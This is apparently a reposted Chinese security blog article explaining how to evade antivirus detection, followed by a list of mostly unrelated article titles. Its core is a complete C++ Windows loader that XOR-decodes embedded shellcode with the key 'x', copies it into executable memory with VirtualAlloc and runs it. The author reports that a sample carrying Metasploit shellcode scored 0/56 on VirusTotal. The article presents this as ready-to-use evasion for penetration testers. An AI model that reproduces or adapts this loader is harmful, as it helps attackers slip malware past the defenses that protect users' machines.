如何利用十行代码,绕过杀毒软件实现免杀?
来源:互联网 发布:pixlr软件 编辑:程序博客网 时间:2024/06/05 09:16
我原本打算写一篇冗长的博客讲述针对不同杀毒软件的绕过技术,但当我开始着手写教程的第一章并上传样本到 virustotal 后,我震惊了!样本得到了 0/56 的检测率。于是我决定扔掉先前的长篇大论,转而记录这个快速、令人难以置信的简单方法。
我相信大部分的读者都会同意这个观点,绕过大部分杀毒软件的基本方法都很平常没什么特殊的。然而,我也偶尔会遇到一些人仅仅依靠工具生成二进制文件,这些文件很容易被杀毒软件通过指纹标记出来。本文主要是为这些人所准备的。
在我们开始接触这段小巧的 C++ 代码前,我想先介绍一个可以非常棒的制造免杀的工具 Veil-Evasion (Veil-Framework的一部分)。这个工具非常神奇 (感谢@harmj0y和他的小伙伴们创建了这个神奇的项目),在几乎所有情况下,它都没有让我失望过。如果有,那我就要批评那些总是不停生成二进制文件然后上传到 virustotal 进行测试的人。如果你不这么做,那就会更加美好了。
无论如何,这就引出了一个问题,既然像 Veil-Evasion 这类的工具这么神奇,那为什么你要关心如何自己在二进制文件加入 shellcode?原因有很多:
- 大牛都很忙而且工具有些过时。
- 工具生成的二进制都拥有相似的指纹,不是指 payload,而是说工具编译二进制的结构有相似的指纹。
- 作为一个渗透测试工作者,你应当知道如何做。
在你看下面的代码前,你应该注意到这是针对 Windows 平台的,很明显代码中有 windows.h 的引用。
#include <windows.h>#include <iostream>int main(int argc, char **argv) { char b[] = {/* 插入你经过与'x'异或操作后的shellcode代码,例如:0x4C,0x4F, 0x4C */}; char c[sizeof b]; for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, c, sizeof c); ((void(*)())exec)();}
很简单,上面的代码创建了一个可以自行添加包含 shellcode 的字符数组,关键点在于将你的 shellcode 与小写字母 ‘x’ 执行异或操作,然后分配一些内存,拷贝字符数组到分配的内存中,最后执行它。需要特别注意的是,你要先将 shellcode 与你选择的关键字(本例中为 ‘x’)进行异或操作,然后将 shellcode 放入到上面代码中并编译。
这时你可能会问“就这样?”。我了解你的感受,因为当时我也是这么想的,在写完第一章内容并上传样本到 virustotal 后并收到 0/56 的检测率。我想强调这是一个令人难以置信的简单和基础的技术,但它成功率却出奇的高。
你生成二进制文件的 SHA256 值可能跟我样本的不太一样,我样本中包含的 shellcode 是由 metasploit framework 生成的。
*原文:attactics,FB小编xiaix编译,转自须注明来自FreeBuf黑客与极客(FreeBuf.COM)
- 如何利用十行代码,绕过杀毒软件实现免杀?
- 如何利用十行代码,绕过杀毒软件实现免杀?
- 绕过杀毒软件之一
- 绕过杀毒软件之一续
- 绕过杀毒软件之一
- 免杀(杀毒软件杀毒原理)
- 从杀毒软件的机制展望未来免杀技术
- 十大免费杀毒软件
- 绕过杀毒软件之一(实时监控篇)
- 三两行代码实现进程防杀,免驱动,IceSword,WSysCheck等无效.
- 如何利用xss绕过360网盾做防360拦截空间!
- 禁用了PowerShell又如何?看我如何用PowerShell绕过应用白名单、环境限制、以及杀毒软件
- 利用json绕过浏览器安全限制,实现跨域访问
- 用小代码测测你的杀毒软件反应到底如何
- java实现 HTTP/HTTPS请求绕过证书检测代码实现
- java实现 HTTP/HTTPS请求绕过证书检测代码实现
- 10行代码绕过亿赛通加密
- 简单实现免杀
- VS 下Qt工程不能生成moc文件的解决方法
- 为何明朝宦官当道如此严重?
- 如何使用okhttp访问百度三方API-频道新闻API_易源
- SQL0911N 由于死锁或超时,已回滚当前事务。原因码“68”。SQLSTATE=40001
- 归并排序
- 如何利用十行代码,绕过杀毒软件实现免杀?
- bootstrap modal居中
- centos下mysql源码编译安装和主备异步配置
- android3种方式查询手机通讯录联系人
- 无线技术知识
- 【Poj 2533】 Longest Ordered Subsequence 最长上升子序列
- TCP和UDP的区别
- JAVA 多线程创建(everything is from ABC)
- 让组头跟着tableview一起拖动